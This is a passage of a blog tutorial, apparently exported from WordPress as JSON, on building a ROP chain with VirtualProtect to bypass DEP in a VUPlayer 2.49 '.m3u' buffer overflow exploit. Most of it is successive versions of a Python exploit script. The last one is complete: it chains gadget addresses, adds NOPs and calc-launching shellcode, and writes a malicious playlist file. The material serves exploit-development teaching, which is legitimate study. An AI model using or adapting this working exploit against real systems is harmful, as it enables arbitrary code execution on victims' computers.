0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0# ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10038a6c)\u00a0\u00a0\u00a0\u00a0#XCHG EAX,EDX # RETN\u00a0<br><br># EBX Chunk Affects: EAX, EBX<br>ebx = struct.pack(&#8216;&lt;L&#8217;, 0x10015fe7)     #POP EAX # RETN<br>ebx += struct.pack(&#8216;&lt;L&#8217;, 0x994801bc)\u00a0\u00a0\u00a0\u00a0# once XOR&#8217;d w the static value 994803BD, this will result in 0x201<br>ebx += struct.pack(&#8216;&lt;L&#8217;, 0x1003a074)\u00a0\u00a0\u00a0\u00a0#XOR EAX,994803BD # RETN<br>ebx += struct.pack(&#8216;&lt;L&#8217;, 0x10032f32)\u00a0\u00a0\u00a0\u00a0#XCHG EAX,EBX # RETN 0x00<br><br># EBP Chunk Affects: EBP<br>ebp = struct.pack(&#8216;&lt;L&#8217;, 0x10017c0d)  #POP EBP # RETN 0x04<br>ebp += struct.pack(&#8216;&lt;L&#8217;, 0x1010539F)\u00a0\u00a0\u00a0\u00a0# pointer to JMP ESP<br>ebp += struct.pack(&#8216;&lt;L&#8217;, 0x10101008)\u00a0\u00a0\u00a0\u00a0# pointer to a ROP NOP to compensate for the RETN 0x04<br>ebp += struct.pack(&#8216;&lt;L&#8217;, 0x10101008)\u00a0\u00a0\u00a0\u00a0# pointer to a ROP NOP to compensate for the RETN 0x04\u00a0<br><br>&#8230;<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h3>ESI<\/h3>\n\n\n\n<p># ESI ???????? =&gt; PTR to VirtualProtect &#8211; DWORD PTR of 0x1060E25C<\/p>\n\n\n\n<p>The memory address of the API call VirtualProtect is already known: 0x1060E25C<\/p>\n\n\n\n<p>We need the&nbsp;DWORD&nbsp;value stored there<\/p>\n\n\n\n<p>We couldn&#8217;t find a gadget for ESI so we&#8217;ve checked with EAX again:<\/p>\n\n\n\n<p><strong><em>Plan:<\/em><\/strong><\/p>\n\n\n\n<ul><li>POP\u00a0pointer to API into EAX<\/li><li>move the\u00a0DWORD\u00a0value held at the address into EAX (load the content of\u00a0[EAX]\u00a0into\u00a0EAX) &#8211;> # MOV EAX,DWORD PTR DS:[EAX] # RETN<\/li><li>exchange EAX into ESI (# XCHG EAX,ESI # RETN on 0x10030950)<\/li><\/ul>\n\n\n\n<h3>The exploit v8<\/h3>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td>&#8230;.<br><br># EAX Chunk Affects: EAX<br>eax = struct.pack(&#8216;&lt;L&#8217;, 0x10015fe7) # pointer to # POP EAX # RETN<br>eax += struct.pack(&#8216;&lt;L&#8217;, 0x90909090)\u00a0<br><br># ECX Chunk Affects: ECX<br>ecx = struct.pack(&#8216;&lt;L&#8217;, 0x10601007) # pntr to # POP ECX # RETN<br>ecx += struct.pack(&#8216;&lt;L&#8217;, 0x101053DC)\u00a0\u00a0\u00a0\u00a0# a writable pointer\u00a0<br><br># EDX Chunk Affects: EAX, EDX<br>edx = struct.pack(&#8216;&lt;L&#8217;, 0x106074f8)\u00a0\u00a0\u00a0\u00a0 # XOR EAX,EAX # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0# ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10038a6c)\u00a0\u00a0\u00a0\u00a0#XCHG EAX,EDX # RETN\u00a0<br><br># EBX Chunk Affects: EAX, EBX<br>ebx = struct.pack(&#8216;&lt;L&#8217;, 0x10015fe7)     #POP EAX # RETN<br>ebx += struct.pack(&#8216;&lt;L&#8217;, 0x994801bc)\u00a0\u00a0\u00a0\u00a0# once XOR&#8217;d w the static value 994803BD, this will result in 0x201<br>ebx += struct.pack(&#8216;&lt;L&#8217;, 0x1003a074)\u00a0\u00a0\u00a0\u00a0#XOR EAX,994803BD # RETN<br>ebx += struct.pack(&#8216;&lt;L&#8217;, 0x10032f32)\u00a0\u00a0\u00a0\u00a0#XCHG EAX,EBX # RETN 0x00<br><br># EBP Chunk Affects: EBP<br>ebp = struct.pack(&#8216;&lt;L&#8217;, 0x10017c0d)  #POP EBP # RETN 0x04<br>ebp += struct.pack(&#8216;&lt;L&#8217;, 0x1010539F)\u00a0\u00a0\u00a0\u00a0# pointer to JMP ESP<br>ebp += struct.pack(&#8216;&lt;L&#8217;, 0x10101008)\u00a0\u00a0\u00a0\u00a0# pointer to a ROP NOP to compensate for the RETN 0x04<br>ebp += struct.pack(&#8216;&lt;L&#8217;, 0x10101008)\u00a0\u00a0\u00a0\u00a0# pointer to a ROP NOP to compensate for the RETN 0x04\u00a0<br><br># ESI Chunk Affects: EAX, ESI<br>esi = struct.pack(&#8216;&lt;L&#8217;, 0x10015fe7)\u00a0\u00a0\u00a0\u00a0\u00a0#POP EAX # RETN<br>esi += struct.pack(&#8216;&lt;L&#8217;, 0x1060E25C)\u00a0\u00a0\u00a0\u00a0# virtual protect pointer\u00a0<br>esi += struct.pack(&#8216;&lt;L&#8217;, 0x1001eaf1)\u00a0\u00a0\u00a0\u00a0# a pointer to # MOV EAX,DWORD PTR DS:[EAX] # RETN<br>esi += struct.pack(&#8216;&lt;L&#8217;, 0x10030950)\u00a0\u00a0\u00a0\u00a0# a pointer to # XCHG EAX,ESI # RETN<br><br>&#8230;<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h3>EDI<\/h3>\n\n\n\n<p># EDI 10101008 =&gt; ROP-Nop same as EIP<\/p>\n\n\n\n<p>find a pointer to\u00a0# POP EDI # RETN (0x100190b0) and load the value\u00a010101008\u00a0\u00a0on it<\/p>\n\n\n\n<p>At the end, we also add a&nbsp;PUSHAD&nbsp;gadget to push all of the register values (EAX,ECX,DEX,EBX,ESP,EBP,ESI,EDI) onto the stack and set up our API call.<\/p>\n\n\n\n<h3>The exploit v9<\/h3>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td>&#8230;<br><br># EAX Chunk Affects: EAX<br>eax = struct.pack(&#8216;&lt;L&#8217;, 0x10015fe7) # pointer to # POP EAX # RETN<br>eax += struct.pack(&#8216;&lt;L&#8217;, 0x90909090)\u00a0<br><br># ECX Chunk Affects: ECX<br>ecx = struct.pack(&#8216;&lt;L&#8217;, 0x10601007) # pntr to # POP ECX # RETN<br>ecx += struct.pack(&#8216;&lt;L&#8217;, 0x101053DC)\u00a0\u00a0\u00a0\u00a0# a writable pointer\u00a0<br><br># EDX Chunk Affects: EAX, EDX<br>edx = struct.pack(&#8216;&lt;L&#8217;, 0x106074f8)\u00a0\u00a0\u00a0\u00a0 # XOR EAX,EAX # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0# ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10038a6c)\u00a0\u00a0\u00a0\u00a0#XCHG EAX,EDX # RETN\u00a0<br><br># EBX Chunk Affects: EAX, EBX<br>ebx = struct.pack(&#8216;&lt;L&#8217;, 0x10015fe7)     #POP EAX # RETN<br>ebx += struct.pack(&#8216;&lt;L&#8217;, 0x994801bc)\u00a0\u00a0\u00a0\u00a0# once XOR&#8217;d w the static value 994803BD, this will result in 0x201<br>ebx += struct.pack(&#8216;&lt;L&#8217;, 0x1003a074)\u00a0\u00a0\u00a0\u00a0#XOR EAX,994803BD # RETN<br>ebx += struct.pack(&#8216;&lt;L&#8217;, 0x10032f32)\u00a0\u00a0\u00a0\u00a0#XCHG EAX,EBX # RETN 0x00<br><br># EBP Chunk Affects: EBP<br>ebp = struct.pack(&#8216;&lt;L&#8217;, 0x10017c0d)  #POP EBP # RETN 0x04<br>ebp += struct.pack(&#8216;&lt;L&#8217;, 0x1010539F)\u00a0\u00a0\u00a0\u00a0# pointer to JMP ESP<br>ebp += struct.pack(&#8216;&lt;L&#8217;, 0x10101008)\u00a0\u00a0\u00a0\u00a0# pointer to a ROP NOP to compensate for the RETN 0x04<br>ebp += struct.pack(&#8216;&lt;L&#8217;, 0x10101008)\u00a0\u00a0\u00a0\u00a0# pointer to a ROP NOP to compensate for the RETN 0x04\u00a0<br><br># ESI Chunk Affects: EAX, ESI<br>esi = struct.pack(&#8216;&lt;L&#8217;, 0x10015fe7)\u00a0\u00a0\u00a0\u00a0\u00a0#POP EAX # RETN<br>esi += struct.pack(&#8216;&lt;L&#8217;, 0x1060E25C)\u00a0\u00a0\u00a0\u00a0# virtual protect pointer\u00a0<br>esi += struct.pack(&#8216;&lt;L&#8217;, 0x1001eaf1)\u00a0\u00a0\u00a0\u00a0# a pointer to # MOV EAX,DWORD PTR DS:[EAX] # RETN<br>esi += struct.pack(&#8216;&lt;L&#8217;, 0x10030950)\u00a0\u00a0\u00a0\u00a0# a pointer to # XCHG EAX,ESI # RETN<br><br># EDI Chunk Affects: EDI<br>edi = struct.pack(&#8216;&lt;L&#8217;, 0x100190b0)\u00a0\u00a0\u00a0\u00a0\u00a0#POP EDI # RETN<br>edi += struct.pack(&#8216;&lt;L&#8217;, 0x10101008)\u00a0\u00a0\u00a0\u00a0# pointer to a ROP NOP\u00a0<br><br># PUSHAD Chunk<br>pushad = struct.pack(&#8216;&lt;L&#8217;, 0x1001d7a5)\u00a0\u00a0#PUSHAD # RETN<br><br>&#8230;<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h3>Final Script for the chain v10<\/h3>\n\n\n\n<p>ebp, edi, eax, and ecx only affect their own registers.<\/p>\n\n\n\n<p>However edx, esi and ebx also affect eax<\/p>\n\n\n\n<p>So the registers that use eax too should come first to not interfere to each other later<\/p>\n\n\n\n<ul><li>rop = edx<\/li><li>rop += esi<\/li><li>rop += ebx\u00a0<\/li><li>rop += ebp<\/li><li>rop += edi<\/li><li>rop += eax<\/li><li>rop += ecx<\/li><li>rop += pushad<\/li><\/ul>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td>import sys<br>import struct<br>import os\u00a0<br><br>crash_file = &#8220;final.m3u&#8221;\u00a0<br><br># EAX Chunk Affects: EAX<br>eax = struct.pack(&#8216;&lt;L&#8217;, 0x10015fe7) # pointer to # POP EAX # RETN<br>eax += struct.pack(&#8216;&lt;L&#8217;, 0x90909090)\u00a0<br><br># ECX Chunk Affects: ECX<br>ecx = struct.pack(&#8216;&lt;L&#8217;, 0x10601007) # pntr to # POP ECX # RETN<br>ecx += struct.pack(&#8216;&lt;L&#8217;, 0x101053DC)\u00a0\u00a0\u00a0\u00a0# a writable pointer\u00a0<br><br># EDX Chunk Affects: EAX, EDX<br>edx = struct.pack(&#8216;&lt;L&#8217;, 0x106074f8)\u00a0\u00a0\u00a0\u00a0 # XOR EAX,EAX # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0# ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10014474)\u00a0\u00a0\u00a0\u00a0#ADD EAX,4 # RETN<br>edx += struct.pack(&#8216;&lt;L&#8217;, 0x10038a6c)\u00a0\u00a0\u00a0\u00a0#XCHG EAX,EDX # RETN\u00a0<br><br># EBX Chunk Affects: EAX, EBX<br>ebx = struct.pack(&#8216;&lt;L&#8217;, 0x10015fe7)     #POP EAX # RETN<br>ebx += struct.pack(&#8216;&lt;L&#8217;, 0x994801bc)\u00a0\u00a0\u00a0\u00a0# once XOR&#8217;d w the static value 994803BD, this will result in 0x201<br>ebx += struct.pack(&#8216;&lt;L&#8217;, 0x1003a074)\u00a0\u00a0\u00a0\u00a0#XOR EAX,994803BD # RETN<br>ebx += struct.pack(&#8216;&lt;L&#8217;, 0x10032f32)\u00a0\u00a0\u00a0\u00a0#XCHG EAX,EBX # RETN 0x00<br><br># EBP Chunk Affects: EBP<br>ebp = struct.pack(&#8216;&lt;L&#8217;, 0x10017c0d)  #POP EBP # RETN 0x04<br>ebp += struct.pack(&#8216;&lt;L&#8217;, 0x1010539F)\u00a0\u00a0\u00a0\u00a0# pointer to JMP ESP<br>ebp += struct.pack(&#8216;&lt;L&#8217;, 0x10101008)\u00a0\u00a0\u00a0\u00a0# pointer to a ROP NOP to compensate for the RETN 0x04<br>ebp += struct.pack(&#8216;&lt;L&#8217;, 0x10101008)\u00a0\u00a0\u00a0\u00a0# pointer to a ROP NOP to compensate for the RETN 0x04\u00a0<br><br># ESI Chunk Affects: EAX, ESI<br>esi = struct.pack(&#8216;&lt;L&#8217;, 0x10015fe7)\u00a0\u00a0\u00a0\u00a0\u00a0#POP EAX # RETN<br>esi += struct.pack(&#8216;&lt;L&#8217;, 0x1060E25C)\u00a0\u00a0\u00a0\u00a0# virtual protect pointer\u00a0<br>esi += struct.pack(&#8216;&lt;L&#8217;, 0x1001eaf1)\u00a0\u00a0\u00a0\u00a0# a pointer to # MOV EAX,DWORD PTR DS:[EAX] # RETN<br>esi += struct.pack(&#8216;&lt;L&#8217;, 0x10030950)\u00a0\u00a0\u00a0\u00a0# a pointer to # XCHG EAX,ESI # RETN<br><br># EDI Chunk Affects: EDI<br>edi = struct.pack(&#8216;&lt;L&#8217;, 0x100190b0)\u00a0\u00a0\u00a0\u00a0\u00a0#POP EDI # RETN<br>edi += struct.pack(&#8216;&lt;L&#8217;, 0x10101008)\u00a0\u00a0\u00a0\u00a0# pointer to a ROP NOP\u00a0<br><br># PUSHAD Chunk<br>pushad = struct.pack(&#8216;&lt;L&#8217;, 0x1001d7a5)\u00a0\u00a0#PUSHAD # RETN<br><br>rop = edx<br>rop += esi<br>rop += ebx\u00a0<br>rop += ebp<br>rop += edi<br>rop += eax<br>rop += ecx<br>rop += pushad\u00a0<br>nops = &#8220;\\x90&#8221; * 16\u00a0<br><br>calc = (&#8220;\\x31\\xD2\\x52\\x68\\x63\\x61\\x6C\\x63\\x89\\xE6\\x52\\x56\\x64&#8221;<br>&#8220;\\x8B\\x72\\x30\\x8B\\x76\\x0C\\x8B\\x76\\x0C\\xAD\\x8B\\x30\\x8B&#8221;<br>&#8220;\\x7E\\x18\\x8B\\x5F\\x3C\\x8B\\x5C\\x1F\\x78\\x8B\\x74\\x1F\\x20&#8221;<br>&#8220;\\x01\\xFE\\x8B\\x4C\\x1F\\x24\\x01\\xF9\\x42\\xAD\\x81\\x3C\\x07&#8221;<br>&#8220;\\x57\\x69\\x6E\\x45\\x75\\xF5\\x0F\\xB7\\x54\\x51\\xFE\\x8B\\x74&#8221;<br>&#8220;\\x1F\\x1C\\x01\\xFE\\x03\\x3C\\x96\\xFF\\xD7&#8221;)\u00a0<br><br>fuzz = &#8220;A&#8221; * 1012<br>fuzz += &#8220;\\x08\\x10\\x10\\x10&#8221; # 10101008\u00a0\u00a0&lt;&#8211; Pointer to a RETN<br>fuzz += rop\u00a0<br>fuzz += nops<br>fuzz += calc<br>fuzz += &#8220;C&#8221; * (3000 &#8211; len(fuzz))\u00a0<br><br>file= open(crash_file, &#8220;w&#8221;)<br>file.write(fuzz)<br>file.close()\u00a0<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"1002\" height=\"588\" src=\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-11.png\" alt=\"\" class=\"wp-image-180\" srcset=\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-11.png 1002w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-11-300x176.png 300w, https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/01\/image-11-768x451.png 768w\" sizes=\"(max-width: 1002px) 100vw, 1002px\" \/><\/figure>\n\n\n\n<h3>Resources: (big thanks to these blogposts)<\/h3>\n\n\n\n<ul><li><a href=\"https:\/\/www.corelan.be\/index.php\/2010\/06\/16\/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube\/\">https:\/\/www.corelan.be\/index.php\/2010\/06\/16\/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube\/<\/a><\/li><li><a href=\"https:\/\/www.fuzzysecurity.com\/tutorials\/expDev\/7.html\">https:\/\/www.fuzzysecurity.com\/tutorials\/expDev\/7.html<\/a><\/li><li><a href=\"https:\/\/h0mbre.github.io\/Creating_Win32_ROP_Chains\/#\">https:\/\/h0mbre.github.io\/Creating_Win32_ROP_Chains\/#<\/a><\/li><li><a href=\"https:\/\/www.shogunlab.com\/blog\/2018\/02\/11\/zdzg-windows-exploit-5.html\">https:\/\/www.shogunlab.com\/blog\/2018\/02\/11\/zdzg-windows-exploit-5.html<\/a><\/li><\/ul>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>We&#8217;ll work on&nbsp;VUPlayer 2.49 (Windows 7) &#8211; &#8216;.m3u&#8217; Local Buffer Overflow (DEP Bypass) for this article Initial exploit v1: EIP Control import sysimport structimport os\u00a0 crash_file\u00a0= &#8220;test.m3u&#8221;\u00a0fuzz\u00a0= &#8220;A&#8221; * 1012fuzz += &#8220;B&#8221; * 4fuzz += &#8220;C&#8221; * (3000 &#8211; len(fuzz))\u00a0 file= open(crash_file, &#8220;w&#8221;)file.write(fuzz)file.close() Start the app and attach to Immunity Drag the m3u file on&hellip; <a class=\"more-link\" href=\"https:\/\/areyou1or0.it\/index.php\/2022\/01\/24\/rop-gadgets-virtualprotect\/\">Continue reading <span class=\"screen-reader-text\">ROP Gadgets: VirtualProtect()<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[18],"tags":[],"_links":{"self":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/168"}],"collection":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/comments?post=168"}],"version-history":[{"count":2,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/168\/revisions"}],"predecessor-version":[{"id":182,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/168\/revisions\/182"}],"wp:attachment":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/media?parent=168"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/categories?post=168"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/tags?post=168"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}